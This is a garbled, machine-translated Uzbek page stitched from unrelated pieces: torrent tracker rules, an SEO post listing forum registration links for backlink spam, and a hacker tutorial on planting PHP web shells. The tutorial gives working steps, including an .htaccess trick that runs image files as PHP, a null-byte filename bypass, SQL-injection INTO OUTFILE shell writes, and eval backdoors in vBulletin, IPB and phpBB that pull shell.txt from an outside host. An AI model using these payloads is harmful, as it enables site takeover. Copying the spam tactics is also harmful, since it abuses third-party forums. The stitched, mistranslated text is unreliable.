profil php rejimi amalga oshirildi. Qobiqni to'ldirish usullari

Kuzatuvchi uchun qoidalar va cheklovlar.

1. Umumiy qoidalar va cheklovlar
1.1. Ushbu treker qoidalarini muhokama qilib bo'lmaydi va trekerda bo'lgan har bir kishi so'zsiz rioya qilishi kerak. Faqat Tracker ma'murlariga istisno holatlarda qoidalarning ba'zi qoidalariga rioya qilmaslikka ruxsat beriladi.
1.2. Kuzatuvchi ma'muriyati treker va uning foydalanuvchilari bilan bog'liq har qanday ziddiyatli vaziyatlarni hal qilish mumkin bo'lgan yagona va eng yuqori organdir. Shunday qilib, ma'murlarning qarorlari yakuniy hisoblanadi va shikoyat qilinishi mumkin emas.
1.3. Tracker ma'muriyati ushbu qoidalarning barcha bandlarini oldindan yoki keyingi ogohlantirmasdan o'zgartirish va to'ldirish huquqini o'zida saqlab qoladi. Qoidalarga qo‘shimcha va o‘zgartirishlar e’lon qilingan paytdan e’tiboran kuchga kiradi. Biroq, xayrixohlik harakati sifatida Ma'muriyat imkon qadar bunday o'zgarishlarni foydalanuvchilarning e'tiboriga etkazishga harakat qiladi.
1.4. Ushbu va boshqa Tracker qoidalarini bilmaslik nafaqat ularni buzganlik uchun javobgarlikdan ozod qilmaydi, balki o'z-o'zidan buzilish va og'irlashtiruvchi holatdir.
1.5. Yuklash va yuklab olish haqidagi ma'lumotlarni soxtalashtirish uchun har qanday dasturlardan foydalanish taqiqlanadi. Firibgarlar darhol taqiqlanadi.
1.7. Kuzatuvchi nosozliklari va xatolaridan shaxsiy maqsadlarda foydalanish taqiqlanadi. Nosozliklar va xatolar aniqlangan taqdirda, siz Tracker ma'muriyatiga xabar berishingiz kerak.
2. Ro'yxatdan o'tish
Ro'yxatdan o'tish trekerda bo'lishning ajralmas qismidir. Ro'yxatdan o'tish avtomatik ravishda ushbu Qoidalarga roziligingizni bildiradi. Agar siz ushbu Qoidalarga rozi bo'lmasangiz, ma'muriyatga yozing.
2.1. TURLI XORIJIY PROKSI SERVERLARDAN RO'YXATDAN O'TISH TA'qiqlangan. Qoidabuzarlar - darhol taqiq!!!
Istisno hollarda, ariza ma'muriyat tomonidan ko'rib chiqilgandan keyingina ruxsat etiladi.
2.2. BIR KOMPYUTERDAN IKKIDAN ORQANDA AKUNOTNI RO‘YXATDAN O‘TISH TA’qiqlanadi. Buzilgan taqdirda, barcha mavjud hisoblar taqiqlanadi.
Mavjud ikkitadan keyin yangi hisob qaydnomasini ro'yxatdan o'tkazish faqat ma'muriyatning roziligi bilan mumkin.
3. Qo'llarga sharh berish qoidalari
3.1. Tarqatishlarga izohlarda haqoratli so‘zlardan foydalanish, har qanday behayo so‘z va iboralar, parda bilan qoplangan behayo so‘zlarni, shu jumladan chet tillarida ham foydalanish taqiqlanadi.
Jazo: Qoidalarni buzgan sharhlarni olib tashlash va 1 hafta muddatga sharh yozishni taqiqlash. Bu qoidani keyinchalik buzish 7 kun muddatga va 14 kun muddatga sharh yozishni taqiqlashga olib keladi. Kelajakda sharh yozishga doimiy taqiq qo'yiladi.
3.2. Treker ishtirokchilarini har qanday shaklda haqorat qilish taqiqlanadi. Boshqa ishtirokchilarga nisbatan har qanday qo'pollik, shaxsiy haqorat va odobsiz so'zlarni, ularning obro'siga putur etkazadigan, sha'ni va qadr-qimmatini kamsituvchi so'zlarni, shu jumladan shaxsiy munosabatlarni ommaviy ravishda namoyish qilish, ham trekerdagi shaxsiy xabarlarda, ham tarqatish sharhlarida taqiqlanadi. Ishtirokchilar hurmatli muloqotni davom ettirishlari kerak.
Jazo: Qoidalarni buzuvchi izohlarni olib tashlash va buzuvchini 7 kun muddatga taqiqlash. Keyinchalik bu qoidani buzish 7 kunga va 30 kunga sharh yozishni taqiqlashga olib keladi. Kelajakda sharh yozishga doimiy taqiq qo'yiladi.
3.3. Har qanday xarakterdagi tahdidlar (treker ishtirokchilariga nisbatan virtual, real va boshqa tahdidlar) taqiqlanadi.
Jazo: Xabarlarni o'chirish va huquqbuzarni 14 kunga taqiqlash. Agar bu qoida yana buzilsa, siz bir oyga banlanasiz.
3.4. Olovli (munozarani boshlash uchun mo'ljallangan, tegishli bo'lmagan xabarlar, shuningdek muhokama qilayotganlarni shaxsiylashtirish), toshqin (mavzuga mos kelmaydigan, semantik yuk ko'tarmaydigan yoki faqat kulgichlardan iborat xabarlar), oftopik ( Muhokama qilinayotgan mavzuga aloqador bo'lmagan xabarlar) taqiqlanadi. , shuningdek, suv toshqini, olov, mavzudan tashqari va "Yordam", "Muammo", "Nima haqida gapiryapsan, a?" yoki "Men tushunmadim - qaerdan yuklab olish kerak?" va shunga o'xshash, bu taqsimot bilan bog'liq bo'lmagan. Bitta izohda 3 tadan ortiq kulgich bo‘lishi mumkin.
Jazo: Qoidalarni buzgan sharhlarni olib tashlash va sharh muallifini 3 kun muddatga ogohlantirish. Agar ushbu qoida yana buzilsa, sharh muallifiga 7 kun muddatga sharh yozish taqiqlanadi. Kelajakda har bir qoidabuzarlik uchun 14 kun muddatga sharh qoldirish taqiqlanadi va 14 kun muddatga yuklab olish taqiqlanadi.
3.5. Izohlarda tijorat xabarlarini, to'g'ridan-to'g'ri yoki bilvosita reklamani, spam-xabarlarni va tarqatish bilan bevosita bog'liq bo'lmagan saytlarga havolalarni joylashtirish taqiqlanadi.
Jazo: Reklamani olib tashlash, 7 kun muddatga sharh yozishni taqiqlash va 7 kun muddatga yuklab olishni taqiqlash. Takroriy qoidabuzarlik holatlarida 15 kun muddatga sharh yozish va 15 kun muddatga yuklab olish taqiqlanadi. Kelajakda sharh yozishga doimiy taqiq qo'yiladi.
3.6. Sharhlarda irqiy, milliy va diniy adovatni ko‘rsatish, siyosiy partiyalarni tashviqot qilish, terrorizm, ekstremizm, giyohvandlik, diniy va umume’tirof etilgan axloq va odob-axloq qoidalariga to‘g‘ri kelmaydigan boshqa mavzularda targ‘ibot qilish taqiqlanadi.
Jazo: Qoidalarni buzgan sharhlarni olib tashlash, 14 kun muddatga sharh yozishni taqiqlash va 14 kun muddatga yuklab olishni taqiqlash. Takroriy qoidabuzarlik holatlarida 30 kun muddatga sharh yozish va 30 kun muddatga yuklab olish taqiqlanadi. Kelajakda sharh yozishga doimiy taqiq qo'yiladi.
3.7. Rossiya Federatsiyasi Jinoyat kodeksini ochiq yoki yashirin ravishda buzadigan sharhlarni, shuningdek, noqonuniy xatti-harakatlarga chaqiruvchi xabarlarni qoldirish taqiqlanadi.
Jazo: Xabarlarni o'chirish, 14 kun muddatga sharh yozishni taqiqlash va 14 kun muddatga yuklab olishni taqiqlash. Buzilish takroran sodir etilgan taqdirda, huquqbuzar 30 kun muddatga man etiladi. Uchinchi qoidabuzarlik uchun - doimiy taqiq.
3.8. Tarqatishlarga berilgan izohlarda foydalanuvchilarning har qanday shaxsiy ma’lumotlarini, maxfiy ma’lumotlarini, haqiqiy to‘liq ism-shariflarini oshkor qilish, fotosuratlarini nashr etish, muhokama ishtirokchisining shaxsiy yoki oilaviy sirini tashkil etuvchi shaxsiy hayoti haqidagi ma’lumotlarni uning roziligisiz tarqatish taqiqlanadi.
Jazo: qoidani buzuvchi izohlarni olib tashlash va kuzatuvchiga og'zaki ogohlantirish. Takroriy qoidabuzarlik holatlarida 7 kun muddatga sharh yozish taqiqlanadi. Kelajakda 30 kunlik muddatga sharh yozish taqiqlanadi.
3.9. Izohlarda pornografiya, zo'ravonlik sahnalari yoki boshqa foydalanuvchilarni kamsituvchi yoki haqorat qiluvchi boshqa rasmlarni o'z ichiga olgan rasmlarni joylashtirish taqiqlanadi.
Jazo: Qoidalarni buzgan sharhlarni o'chirish va 7 kun muddatga yuklab olish va sharh qoldirishni taqiqlash. Agar qoidabuzarlik takrorlangan bo'lsa, foydalanuvchi 7 kun muddatga taqiqlanadi. Kelajakda - 15 kunlik muddatga taqiq va sharhlar yozishni doimiy ravishda taqiqlash.
3.10. Izohlarda rus tilidan boshqa til va kirilldan boshqa shriftdan foydalanish taqiqlanadi.
Jazo: Xabarlarni o'chirish va foydalanuvchiga og'zaki ogohlantirish; ushbu band qoidalarini takroran buzgan taqdirda, 3 kun muddatga sharh yozishni taqiqlash.
3.11. Xabarlarda quyidagi ta'kidlash usullaridan foydalanish taqiqlanadi: qizil, 75% dan ortiq bosh harflar va katta shrift o'lchami - bu moderatorlar va administratorlarning imtiyozidir.
Jazo: Xabarlarni o'chirish va foydalanuvchiga og'zaki ogohlantirish; ushbu band qoidalarini takroran buzgan taqdirda, 7 kun muddatga sharh yozishni taqiqlash.
3.12. Haddan tashqari iqtibos keltirish taqiqlanadi (boshqa ishtirokchilarning xabarlarini oqilona miqdordan oshib ketadigan miqdorda (asl xabarning 10 qatoridan ortiq) keltirish).
Jazo: Xabarni tahrirlash va foydalanuvchini og'zaki ogohlantirish; ushbu band qoidalarini takroran buzgan taqdirda, 3 kun muddatga sharh yozishni taqiqlash.
3.13. Buzg'unchilar taqiqlanadi va spoylerlardan foydalanishdan saqlaning (asosiy syujet nuqtalarini oshkor qilish, bilish boshqalarning tomosha qilish tajribasini, o'yin natijasini va hokazolarni buzishi mumkin).
Agar siz spoylerlarsiz ishlay olmasangiz, spoylerni [kengaytirish] tegiga kiritishingiz va uning oldiga "Spoiler" belgisini qo'yishingiz kerak.
Eslatma: “Sport” tarqatishlarida 11 tagacha sharhni buzish taqiqlanadi (1 sahifa).
Jazo: Xabarni tahrirlash va foydalanuvchini og'zaki ogohlantirish. Agar siz ushbu band qoidalarini qayta-qayta buzsangiz, 3 kun muddatga sharh yozishingiz taqiqlanadi.
3.14. Qasddan yolg'on ma'lumotlarni o'z ichiga olgan xabarlarni chop etish taqiqlanadi.
Jazo: Qoidalarni buzuvchi izohlarni olib tashlash va foydalanuvchini og'zaki ogohlantirish. Agar siz ushbu band qoidalarini qayta-qayta buzsangiz, sizga 7 kun davomida sharh qoldirish taqiqlanadi.
Torrent sharh tizimi quyidagilar uchun mo'ljallangan:
- Egaga hurmat va minnatdorchilik bildiring;
- Tarqatish bo'yicha sizni qiziqtirgan aniq savolni bering,
- Sovg'a bilan bog'liq qiziqarli ma'lumotlarni taqdim eting.
4. Avatarlar va imzolarga cheklovlar:
4.1. Imzo:
- Maksimal balandlik: 100 punkt (boshqacha aytganda, to'rtta foydalanuvchi paneli yoki o'n satrdan ko'p bo'lmagan matn (shrift o'lchami 10); kenglik: 750 nuqta.
- Imzodagi rasmlarning umumiy og'irligi 200 Kb dan oshmasligi kerak.
- Tarkib: zo'ravonlik, tahdidlar (demografik, milliy, diniy yoki siyosiy asosda), qo'pol so'zlar (ko'ngilsiz so'zlar, ism-shariflar, qo'pollik va boshqalar), buzuqlik (pornografiya), har qanday shakldagi kamsitish, reklama matnlari va tasvirlari yoki reklama sifatida qabul qilinishi mumkin emas, ushbu resursning unvonlari / darajalariga taqlid qilish, shuningdek, provokatsion tasvirlar, shu jumladan. natsist belgilaridan foydalanish.
- Animatsiya: kuchli miltillovchi taglavhalar taqiqlanadi (miltillash darajasi ma'muriyat tomonidan belgilanadi).
- Xabarlaringiz ostidagi imzodan hech qanday tarmoq resurslariga havolalar yaratish uchun foydalanilmaydi. (foydalanuvchi panellari, youtube, google va boshqalar kabi xizmatlarga ega saytlarga havolalar bundan mustasno.)
4.2. Avatar:
- Maksimal o'lcham: 100x100 piksel; vazn: 21 KB gacha.
- Tarkib: zo'ravonlik, tahdidlar (demografik, milliy, diniy yoki siyosiy asosda), qo'pol so'zlar (ko'ngilsiz so'zlar, ism-shariflar, qo'pollik va boshqalar), buzuqlik (pornografiya), har qanday shakldagi kamsitish, giyohvand moddalarni tashviqoti, tijorat reklamasi va reklama matnlari, ushbu resursning unvonlari / unvonlarini taqlid qilish, ma'muriyat a'zolarining avatarlari bilan ataylab o'xshashlik, shuningdek, provokatsion tasvirlar, shu jumladan. natsist belgilaridan foydalanish.
- Animatsiya: kuchli miltillovchi avatarlar taqiqlanadi (miltillash darajasi ma'muriyat tomonidan belgilanadi).
Jazo: Imzo va avatarni olib tashlash yoki ulardan foydalanishni taqiqlash (administrator tomonidan belgilanadi).
5. Relizlar
5.1. Chiqaruvchining shaxsiy ruxsatisiz relizlarni boshqa trekerlarga qayta yuklash taqiqlanadi. Boshqa trekerga qayta yuklash taqiqlangan nashrni tarqatishni qo'llab-quvvatlash mustaqil qayta yuklashga tengdir va 7-bandga muvofiq jazolanadi.
6. Boshqalar
6.1. Vip-fayl, letitbit va boshqalar kabi fayl hosting xizmatlaridan foydalangan holda tarqatishlar mazmunini yuklash taqiqlanadi...
6.2. Torrentlarni yuklab olish uchun har qanday yuklab olish menejerlaridan foydalanish taqiqlanadi.
7. Jazo:
5-6-bandlarda ko'rsatilgan qoidabuzarliklar uchun - 7 kunga taqiq. Ushbu qoidalarni qayta-qayta buzish umrbod cheklanishga olib keladi.

Shunday qilib, men hech kimni ajablantirmayman, deb o'ylaymanki, sizning saytingizga tashqi havolalar qanchalik ko'p bo'lsa, uning TCI va havola qilayotgan saytning TCI qanchalik katta bo'lsa, ushbu havolaning "og'irligi" shunchalik katta bo'ladi. Sizning saytingizga havolalar massasini oshirishning ko'plab usullari mavjud, ammo bugun men ulardan faqat bittasi haqida gapiraman - ishonchli saytlardan tashqi havolalarni olish.
Ushbu maqolada men barcha havolalarni bermayman ishonchli saytlar, men bilaman, lekin men sizga ulardan faqat bittasi - forumlar haqida gapirib beraman.
Veb-saytni belgilashingiz mumkin bo'lgan forumlarda ro'yxatdan o'tish orqali (qoida tariqasida, ular bir xil dvigatelda ishlab chiqariladi), siz tashqi havolani olasiz.
Nima haqida gapirayotganimizni tushunish uchun quyidagi skrinshotga qarang:

Ya'ni, siz shunchaki saytni ko'rsatgan holda bunday forumda ro'yxatdan o'tishingiz kerak. Va tamom. (Xo'sh, ko'pi bilan siz hali ham ro'yxatdan o'tganingizni tasdiqlashingiz kerak, shuning uchun haqiqiy elektron pochtangizni ko'rsating). Odatda, saytingizga havolasi bo'lgan sahifa quyidagicha ko'rinadi:

Endi bu usulning kamchiliklari haqida gapiraylik, mening fikrimcha, ulardan ikkitasi bor:
1) O'ylaymanki, ertami-kechmi siz faolsizligingiz uchun forumdan o'chirilasiz (lekin printsipial jihatdan qayta ro'yxatdan o'tish qiyin bo'lmaydi).
2) Shunga ko'ra, bog'lovchi langarni o'rnatish mumkin emas. (Bu, ehtimol, minus emas, balki haqiqat, lekin baribir).
Xo'sh, endi semiz forumlar ro'yxati. Qulaylik uchun TCI ning kamayish tartibida:
Havola (TCI)
http://forum.igromania.ru/register.php (1700) [Ro'yxatdan o'ting, keyin profilingizda saytni ko'rsating, saqlang]
http://orphus.ru/community/register.html (1500)
http://www.novosti-kosmonavtiki.ru/phpBB2/profile.php?mode=register (1100)
http://www.rmj.ru/phpbb/profile.php?mode=register (1000)
http://www.masterkit.ru/forum/profile.php?mode=register (700)
http://www.ib.ru/forum/profile.php?mode=register (400)
http://forum.mozilla-russia.org/register.php (300) [Profilingizda veb-saytni ko'rsating]
http://mama-tv.ru/forum/profile.php?mode=register (230)
http://www.neodrive.ru/forum/profile.php?mode=register (170)
http://www.systemaspetsnaz.ru/pforum/profile.php?mode=register (150)
http://tele-club.ru/forum/profile.php?mode=register (130)
http://forum.anastasia.ru/profile.php?mode=register (130)
http://www.shalyapin.ru/forum/profile.php?mode=register (130)
http://www.sarinfo.org/forum/profile.php?mode=register (120)
http://nelubit.ru/profile.php?mode=register (100)
http://www.antisex.info/phpbb2/profile.php?mode=register (60)
http://forum.balletfriends.ru/profile.php?mode=register (50)
http://forum.rusbani.ru/profile.php?mode=register (50)
http://zoneland.ru/forum/profile.php?mode=register (40)
http://forum.av.by/profile.php?mode=register (30)
http://forummotor.israelinfo.ru/profile.php?mode=register (30)
http://wolfson.ru/forum/profile.php?mode=register (30)
http://forum.oslik.ru/profile.php?mode=register (30)
http://data-torrents.com/profile.php?mode=register (20)
http://forum.latfutbols.net/profile.php?mode=register (20)
http://www.forum.hyip-reflection.info/profile.php?mode=register (20)
http://wap.tanchiki.ru/for/profile.php?mode=register (10)

http://www.autoplustv.ru/forum/profile.php?mode=register (500)
http://www.spomir.ru/forum/profile.php?mode=register (350)
http://www.fireman.ru/talk/profile.php?mode=register (300)
http://www.fpss.ru/forum-new/profile.php?mode=register (240)
http://www.skaters.ru/forum/profile.php?mode=register (220)
http://www.a-ivanov.ru/forum/profile.php?mode=register (190)
http://abto-acc.ru/forum/profile.php?mode=register (150)
http://www.artdj.ru/forum/profile.php?mode=register (120)
http://doom-metal.ru/room/profile.php?mode=register (100)
http://www.frisbee.by/f/profile.php?mode=register&agreed=true (80)
http://www.texinfo.ru/forum/ucp.php?mode=register (80) [Profilda]
http://globax.biz/forum/profile.php?mode=register (70)
http://www.gracebyte.com/forum/profile.php?mode=register (70)
http://forumjnews.israelinfo.ru/profile.php?mode=register (60)
http://yartech.ru/forum/ucp.php?mode=register (40) [Profilda]
http://amrita-dance.ru/forum/profile.php?mode=register (30)
http://forum.isnet.ru/profile.php?mode=register (30)
http://forum.interair.ru/profile.php?mode=register (0
___________________________________________________________________

Ma'lumotlar bazasining oxirgi yangilanishi 16/06/11 edi(Roʻyxat buzilgan havolalardan tozalandi + qator ostidagi yana bir nechta saytlar qoʻshildi)

Bundan tashqari, ishonchli sayt tufayli siz nafaqat TICni oshirishingiz, balki sayt trafigini ham oshirishingiz mumkin! Ammo buning uchun sizga juda ko'p yaxshi ishonchli saytlar kerak va ular, qoida tariqasida, allaqachon pulga sotilgan. Xo'sh, ularni sotib olish yoki olmaslikni o'zingiz hal qiling ...

Xulosa qilib aytishim mumkinki, bir vaqtning o'zida barcha forumlarda ro'yxatdan o'tmang, aks holda saytingiz qandaydir filtr ostida qolishi mumkin. Menimcha, kuniga 5-8 ta etarli. Hammasi. Omad. 😉

Diqqat!
Men bu eslatmani 2015 yilda yozyapman va shuni aytmoqchimanki, endi mening fikrimcha, u yoki boshqa, yangi ishonchli saytlarda o'z blogingizga (saytingizga) havolalarni qoldirib, siz faqat vaqtingizni behuda o'tkazasiz. Shuning uchun, sharhlarda takroriy savollarga yo'l qo'ymaslik uchun men bu erda yozaman - bu ro'yxatda yangilanishlar bo'lmaydi.
Men ro'yxatimni tekshirishni tavsiya qilaman. Albatta, bunday bloglarda xabarlarni joylashtirish ham avvalgidek samarali emas, lekin yana, mening sub'ektiv fikrimcha, bu ko'p marta samaraliroq.

Salom %username% va uning doʻstlari. Xo'sh, siz zudlik bilan saytga qobiqni yuklashingiz kerak, yaxshi, siz hech qachon bilmaysiz, ehtimol yakuniy to'lov bunga bog'liq. Xo'sh, bu shunchaki ishlamaydi. Bu erda men bir nechta misollar to'pladim (buning uchun Treysi va boshqalarga rahmat).

Keling, qobiqni rasm orqali to'kib tashlaymiz

Siz saytni (albatta, siz faqat sinovdan o'tkazyapsiz) maxsus administrator paneli bilan buzib tashladingiz... Va veb-qobiqni yuklay olmaysiz, lekin u erda rasmlar yuklangan va faqat .jpg, .gif, .png formatlari yuklanadi.
Bu holatda nima qilish mumkin?

Biz .gif kengaytmali qobiqni rasmlarli papkaga joylashtiramiz va mazmuni bilan .htaccess faylini yaratamiz.

AddType ilovasi/x-httpd-php .gif
Bu buyruq .gif formatini php sifatida bajaradi
/shell.gif ni ochishga harakat qilinmoqda

Bundan tashqari, agar skript satrlarning uzilishiga befarq bo'lmasa, biz qobiqni to'ldirishga harakat qilamiz va bir vaqtning o'zida uning nomini o'zgartiramiz. shell.php%00.jpg, shell.php mavjudligini tekshiring, agar bo'lsa?

Mysql.user orqali whine dan qobiqni yuklash usuli

1) Keling, kimning ostida o'tirganimizni bilib olaylik va uning MySQL-ga huquqlarini ham bilib olaylik.

site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Keling, kimning ostida o'tirganimizni bilib olaylik)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=" bizning foydalanuvchimiz "+--+
(Keling, foydalanuvchimizning imtiyozlarini tekshirib ko'ramiz. Agar chiqish paytida xatolik yuzaga kelsa, siz bizning foydalanuvchimizni 0x ga o'zgartirishingiz mumkin)
3) site.com/index.php?id=-1+union+select+1,"",3+mysql.user+from+outfile+" Faylga yo'l "+--+
(Mini-qobiqni to'ldiring)
P.S.
Har bir narsa ishlashi uchun siz yozish huquqiga ega bo'lishingiz va ildizga to'liq yo'lni bilishingiz kerak.
Bundan tashqari, quyidagi kabi yozish ruxsatlarini tekshirishingiz mumkin:

site.com/index.php?id=1+and+1=0+union+Select+1," prava ",3+mysql.userdan+--+
Agar prava ko'rsatilsa, sizda huquqlar mavjud.

Quyidagi holat. Biz vBulletin forum dvigatelining boshqaruv panelidamiz

Qani ketdik:
Plaginlar va mahsulotlar -> Plagin menejeri -> Plaginlar va mahsulotlar -> Plugin menejeri -> [Yangi plagin qo'shish]

Shablonlarni tanlang. Odatda biz faq_complete ni tanlaymiz, plagin faol bo'lgan katakchani tanlang va bosing, uni "Ha" ga qo'ying va saqlang.

localhost/forum/faq.php?cmd=phpinfo();

Agar biz phpinfo() ni chop etgan bo'lsak, qo'limizdagi qobiqni ko'rib chiqing.

Keyingi phpinfo-da siz forumga to'liq yo'lni topishingiz kerak (masalan, /home/u0000/site.ru/www/sell.php). Keyinchalik, veb-qobig'imizni txt fayliga aylantirishimiz va uni istalgan veb-saytga yuklashimiz kerak
mysite.com/shell.txt
Buyruq bilan qobiqni to'ldiring

localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Bu jamoa nima qiladi? U [a] oʻzgaruvchisi mazmunini [b] oʻzgaruvchisiga koʻchiradi, yaʼni shell.txt shell.phpʼga koʻchiriladi.

Qobiqni IPB 3 ga yuklash

Qani ketdik:
Support->SQL Management->Running jarayonlar->Yangi so'rovni ishga tushirish

Kod:
"Z:/home/site.ru/www/uploads/shell.php" tashqi faylida 0x3c3f706870696e666f28293b3f3e ni tanlang.
To'liq yo'lni quyidagicha ko'rishingiz mumkin:

Admin->Yordam
Yuqorida yozilgan PHP versiyasi va chapda PHPINFO ga havola bo'ladi.

Shell bu erda:
http://site.com/uploads/shell.php

Shellni phpBB 2 ga yuklash

1. Ex.sql faylini yarating
2. U yerda roʻyxatdan oʻting

phpbb_users SETni YANGILASH user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Bu erda user_id=2 administrator identifikatoridir

3. Administrator paneliga o'ting
4. Administrator panelida “Restore DB” bandini tanlang va ex.sql ni yuklab oling
5. Kodni bajaring / Qobiqni shunday to'ldiring

Qani ketdik:
http://target/profile.php?mode=editprofile&e=phpinfo();
Keyin:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/ site.ru/www/sell.php
phpinfo() ni ko'rsatish uchun tizimga kirishingiz kerak.

Bu qobiqni qanday va qaysi dvigatellarga yuklash mumkinligining qisqacha ro'yxati. Yana kerakmi? rdotdagi yigitlarga xush kelibsiz
forumlarga yuklash
sms bo'yicha to'ldirish
Va bu erda mening sevimli qobiq, shuningdek, rdot-da))